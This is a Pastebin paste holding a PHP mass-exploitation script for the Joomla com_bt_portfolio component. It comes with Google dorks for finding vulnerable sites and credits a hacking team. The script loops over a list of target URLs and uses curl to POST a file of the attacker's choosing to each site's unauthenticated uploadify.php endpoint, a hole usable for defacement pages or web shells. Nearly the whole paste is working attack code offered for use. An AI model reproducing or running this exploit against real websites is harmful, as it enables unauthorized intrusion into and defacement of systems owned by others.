Advertisement
Synchronizer

Joomla com_bt_portfolio auto exploiter by Synchronizer V.2

Oct 31st, 2014
304
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 1.87 KB | None | 0 0
  1. TUTORIAL : http://www.synchronizer.tk/2014/09/php-joomla-combtportfolio-auto-exploiter.html
  2.  
  3. <?php
  4.  
  5. #Joomla Com_bt_portfolio Auto Exploiter
  6. #Coded By : Synchronizer (Sanjungan Jiwa Team)
  7.  
  8. #Visit My Blog : www.synchronizer.tk
  9.  
  10. #Thanks to : De4dly_PoiSon - eX-Sh1Ne - MrTieDie - Freezer22 - AdrElite
  11. #            IsanDeCader - Sh0uT0u7 - R3dh34d - ReC0ded - Xpronator2 - MR.COM
  12.                  
  13. #Dork :          inurl:/bt_foto
  14. #                inurl:/bt_portfolio
  15. #                inurl:/bt_metro
  16. #                inurl:/index.php?option=com_bt_portfolio
  17. $file="cx.html"; #Your fi;e that you will upload
  18. $dirup="/";  #Dir upload ex: "/" << Public HTMl (site.com/yourfile) | "/images/" << at dir /images (site.com/images/yourfile)
  19. $get=file_get_contents($argv[1]);
  20. $j=explode("\r\n",$get);
  21. echo "================================================================================\n";
  22. echo "\t    => Total Website Target : ".count($j)."\n";
  23. echo "\n\t    => File Yang di Upload  : $file\n";
  24. echo "\n\t    => Direktori Upload     : $dirup\n";
  25. echo "================================================================================\n\n";
  26. foreach($j as $site){
  27.  
  28. echo "\n\t[+] Uploading file to : ".$site;
  29.  
  30. $uploadfile="$file";
  31. $ch =curl_init("$site/administrator/components/com_bt_portfolio/helpers/uploadify/uploadify.php");
  32. curl_setopt($ch, CURLOPT_POST, true);
  33. curl_setopt($ch, CURLOPT_POSTFIELDS,
  34. array('Filedata'=>"@$uploadfile",'folder'=>"$dirup"));
  35. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  36. $postResult = curl_exec($ch);
  37. curl_close($ch);{
  38. print "\n\n\nHasil upload =>> $postResult\n";
  39. echo "\n================================================================================\n";
  40. echo "\n     Copyright 2014 - Joomla com_bt_portfolio auto exploiter by Synchronizer\n";
  41. echo "\n================================================================================\n";
  42. echo "\n\n\t";
  43. }
  44. }
  45. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement